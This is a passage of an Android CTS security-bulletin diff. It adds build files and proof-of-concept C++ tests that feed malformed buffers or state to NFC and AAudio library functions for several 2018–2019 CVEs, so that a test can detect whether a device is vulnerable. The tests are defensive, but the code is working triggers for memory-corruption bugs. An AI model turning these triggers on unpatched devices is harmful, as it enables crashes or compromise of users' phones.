(C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9584", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp new file mode 100644 index 00000000000..94aa6429c4a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp @@ -0,0 +1,49 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "../includes/memutils.h" +#include <nfc_int.h> + +#define LENGTH 16 + +char enable_selective_overload = ENABLE_NONE; +extern tNFC_CB nfc_cb; + +static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE *p_data) { + (void) event; + (void) p_data; +} + +int main() { + nfc_cb.p_resp_cback = resp_cback; + + enable_selective_overload = ENABLE_ALL; + uint8_t *p_msg = (uint8_t *)malloc(LENGTH); + if (!p_msg) { + return EXIT_FAILURE; + } + + // Set evt_data.set_config.status + *p_msg = 0x03; + // Set evt_data.set_config.num_param_id + *(p_msg + 1) = 255; + nfc_ncif_set_config_status(p_msg, LENGTH); + + free(p_msg); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp new file mode 100644 index 00000000000..8bbdd4fbed6 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9585", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp new file mode 100644 index 00000000000..7227adff091 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp @@ -0,0 +1,48 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "../includes/memutils.h" +#include <nfc_int.h> + +#define LENGTH 16 + +char enable_selective_overload = ENABLE_NONE; +extern tNFC_CB nfc_cb; + +static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE* p_data) { + (void) event; + (void) p_data; +} + +int main() { + nfc_cb.p_resp_cback = resp_cback; + + enable_selective_overload = ENABLE_ALL; + uint8_t *p_msg = (uint8_t *)malloc(LENGTH); + if (!p_msg) { + return EXIT_FAILURE; + } + memset(p_msg, 0x01, LENGTH); + + // Set evt_data.tlv_size + *(p_msg + 5) = 200; + nfc_ncif_proc_get_routing(p_msg, LENGTH); + + free(p_msg); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp new file mode 100644 index 00000000000..83150843142 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp @@ -0,0 +1,29 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2019-2007", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libaaudio_internal", + ], + include_dirs: [ + "frameworks/av/media/libaaudio/src", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp new file mode 100644 index 00000000000..7f8ebdb0b0f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "fifo/FifoBuffer.h" +#include "fifo/FifoController.h" +#include <stdlib.h> + +#define CAPACITY 83 +#define THRESHOLD 47 +#define NUM_FRAMES -9999999999 + +using android::FifoController; + +int main() { + FifoController fifoController(CAPACITY, THRESHOLD); + fifoController.advanceReadIndex((android::fifo_frames_t)NUM_FRAMES); + fifoController.advanceWriteIndex((android::fifo_frames_t)NUM_FRAMES); + int32_t readIndex = fifoController.getReadIndex(); + int32_t writeIndex = fifoController.getWriteIndex(); + + if ((readIndex < 0) || (writeIndex < 0)) { + return EXIT_VULNERABLE; + } + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp new file mode 100644 index 00000000000..7ffdd65281e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2013", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp new file mode 100644 index 00000000000..23098acdf43 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp @@ -0,0 +1,168 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_int.h> +#include <rw_int.h> +#include <dlfcn.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#define T3T_MSG_FELICALITE_MC_OFFSET 0x01 + +char enable_selective_overload = ENABLE_NONE; + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN], + uint8_t mrti_check, uint8_t mrti_update); + +static void (*real_GKI_freebuf)(void* ptr) = nullptr; +void *kAllocatedPointers[2]; +int allocatedPointersIndex = -1; +bool kIsInitialized = false; + +void init(void) { + real_GKI_freebuf = (void (*)(void*))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void GKI_freebuf(void* ptr) { + if (!kIsInitialized) { + init(); + } + if (ptr == kAllocatedPointers[0] || ptr == kAllocatedPointers[1]) { + return; + } else { + real_GKI_freebuf(ptr); + } +} + +void *allocate_memory(size_t size) { + void *ptr = malloc(size); + memset(ptr, 0x0, size); + kAllocatedPointers[++allocatedPointersIndex] = ptr; + return ptr; +} + +// borrowed from rw_i93.cc +enum { + RW_T3T_CMD_DETECT_NDEF, + RW_T3T_CMD_CHECK_NDEF, + RW_T3T_CMD_UPDATE_NDEF, + RW_T3T_CMD_CHECK, + RW_T3T_CMD_UPDATE, + RW_T3T_CMD_SEND_RAW_FRAME, + RW_T3T_CMD_GET_SYSTEM_CODES, + RW_T3T_CMD_FORMAT, + RW_T3T_CMD_SET_READ_ONLY_SOFT, + RW_T3T_CMD_SET_READ_ONLY_HARD, + + RW_T3T_CMD_MAX +}; + +// borrowed from rw_i93.cc +enum { + RW_T3T_STATE_NOT_ACTIVATED, + RW_T3T_STATE_IDLE, + RW_T3T_STATE_COMMAND_PENDING +}; + +// borrowed from rw_i93.cc +enum { + /* Sub states for formatting Felica-Lite */ + RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for + formatting) */ + RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-read to complete */ + RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-write to complete */ + RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write + to complete */ + + /* Sub states for setting Felica-Lite read only */ + RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for + setting read only) */ + RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write + to complete */ + RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl) + block-read to complete */ + RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl) + block-write to complete */ +}; + +void cback(uint8_t c __attribute__((unused)), + tRW_DATA* d __attribute__((unused))) { +} + +int main() { + + enable_selective_overload = ENABLE_ALL; + tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t; + + GKI_init(); + rw_init(); + + uint8_t peer_nfcid2[NCI_RF_F_UID_LEN]; + uint8_t mrti_check = 1, mrti_update = 1; + if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + p_data->status = NFC_STATUS_OK; + + p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD; + p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING; + p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK; + + NFC_HDR* p_msg = (p_data->data).p_data; + p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN; + + uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1); + p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP; + p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK; + + uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA]; + p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET; + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + TIMER_LIST_ENT pFirst = { }; + nfc_cb.quick_timer_queue.p_first = &pFirst; + + rw_cb.p_cback = &cback; + p_cb->p_cback(0, event, p_data); + + free(p_data->data.p_data); + free(p_data); + + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp new file mode 100644 index 00000000000..b5a7b9969ca --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp @@ -0,0 +1,34 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2014", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp new file mode 100644 index 00000000000..26c607e9865 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp @@ -0,0 +1,60 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <rw_int.h> +#include <stdlib.h> + +#include "../includes/common.h" + +// borrowed from rw_t3t.cc +#define RW_T3T_SENSF_RES_RD_OFFSET 17 +#define RW_T3T_SENSF_RES_RD_LEN 2 +#define DEFAULT_VALUE 0xBE + +extern tRW_CB rw_cb; +void rw_init(void); +void cback(uint8_t, tRW_DATA *) {} + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +int main() { + tRW_T3T_CB *p_cb = &rw_cb.tcb.t3t; + + GKI_init(); + rw_init(); + rw_cb.p_cback = &cback; + + for (int n = 0; n < NCI_NFCID2_LEN; ++n) { + p_cb->peer_nfcid2[n] = DEFAULT_VALUE; + } + + p_cb->num_system_codes = T3T_MAX_SYSTEM_CODES; + p_cb->flags = RW_T3T_FL_W4_GET_SC_POLL_RSP; + + uint8_t nci_status = NCI_STATUS_OK; + uint8_t num_responses = 1; + uint8_t sensf_res_buf_size = + RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN; + uint8_t *p_sensf_res_buf = + (uint8_t *)malloc(RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN); + rw_t3t_handle_nci_poll_ntf(nci_status, num_responses, sensf_res_buf_size, + p_sensf_res_buf); + + free(p_sensf_res_buf); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp new file mode 100644 index 00000000000..fe6619120ad --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2019", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + include_dirs: [ + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfc/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp new file mode 100644 index 00000000000..483b7c45c7a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp @@ -0,0 +1,65 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <ce_int.h> +#include <nfc_int.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#define OFFSET 8 +#define VULNERABLE_LENGTH 0 + +char enable_selective_overload = ENABLE_NONE; + +extern tNFC_CB nfc_cb; +extern tCE_CB ce_cb; + +void GKI_freebuf(void* p_buf __attribute__((unused))) {} + +void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {} + +void nfc_stop_timer(TIMER_LIST_ENT*) {} + +void nfc_stop_quick_timer(TIMER_LIST_ENT*) {} + +int main() { + enable_selective_overload = ENABLE_ALL; + GKI_init(); + ce_init(); + ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED; + + if (ce_select_t4t() != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN)); + p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16); + NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data; + p_c_apdu->len = VULNERABLE_LENGTH; + p_c_apdu->offset = OFFSET; + uint8_t conn_id = 1; + TIMER_LIST_ENT pFirst = {}; + nfc_cb.quick_timer_queue.p_first = &pFirst; + + p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data); + + free(p_data->data.p_data); + free(p_data); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp new file mode 100644 index 00000000000..bd2504eeec2 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2035", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp new file mode 100644 index 00000000000..a5dfb299c72 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp @@ -0,0 +1,111 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <rw_int.h> +#include <nfc_int.h> + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t* p_uid); + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void*) { +} + +void GKI_start_timer(uint8_t, int32_t, bool) { +} + +void GKI_stop_timer(uint8_t) { +} + +int main() { + tRW_I93_CB* p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *) malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *) malloc(sizeof(uint8_t) * 32); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + NFC_HDR *p_resp = (NFC_HDR*) p_data->data.p_data; + p_resp->len = 0; + p_resp->offset = 0; + + p_i93->state = RW_I93_STATE_UPDATE_NDEF; + p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN; + p_i93->block_size = 2 * (I93_MAX_BLOCK_LENGH + 1); + p_i93->ndef_tlv_start_offset = 2 * (I93_MAX_BLOCK_LENGH) - 1; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp new file mode 100644 index 00000000000..942d552fd36 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2040", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp new file mode 100644 index 00000000000..384c0859690 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp @@ -0,0 +1,112 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> + +constexpr int kLength = 8; + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); + +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + 